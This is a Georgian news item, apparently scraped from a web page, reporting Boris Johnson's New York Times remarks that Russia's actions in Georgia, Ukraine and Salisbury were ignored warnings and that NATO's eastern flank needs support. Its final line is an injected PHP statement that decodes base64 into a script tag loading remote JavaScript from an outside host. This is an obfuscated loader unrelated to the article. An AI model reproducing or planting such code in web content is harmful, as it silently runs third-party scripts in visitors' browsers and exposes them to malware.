celsiusi
ავერსი საქკაბელი
დიდი ბრიტანეთის პრემიერ მინისტრის ბორის ჯონსონის განცხადებით,"მსოფლიომ ჭკუა ვერ ისწავლა" და ვერავინ იტყვის, რომ განვითარებულ მოვლენებზე გაფრთხილებულები არ იყვნენ. ამის შესახებ პრემიერ–მინისრმა The New York Times-თან ინტერვიუს დროს უკრაინაში მიმდინარე მოვლენებზე ისაუბრისას განაცხადა. 
 
"ვერავინ იტყვის, რომ არ გაგვაფრთხილეს, ჩვენ ვნახეთ რა გააკეთა რუსეთმა საქართველოში 2008 წელს, უკრაინაში 2014 წელს და თუნდაც ბრიტანეთის ქალაქ სოლსბერის ქუჩებში,"- აღნიშნა ბორის ჯონსონმა და გაიმეორა, რომ აუცილებელია იმოქმედონ ევროატლანტიკური უსაფრთხოების გასაძლიერებლად.
 
ბრიტანეთის პრემიერის შეფასებით, ეს მოიცავს ნატოს აღმოსავლეთ ფლანგის გაძლიერებას, მათ შორის ნატოს არაწევრი ევროპული ქვეყნების მხარდაჭერას, რომლებიც ასევე წარმოადგენენ კრემლის სცენარის ნაწილს," - განაცხადა ბორის ჯონსონმა.
 
 
1907
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");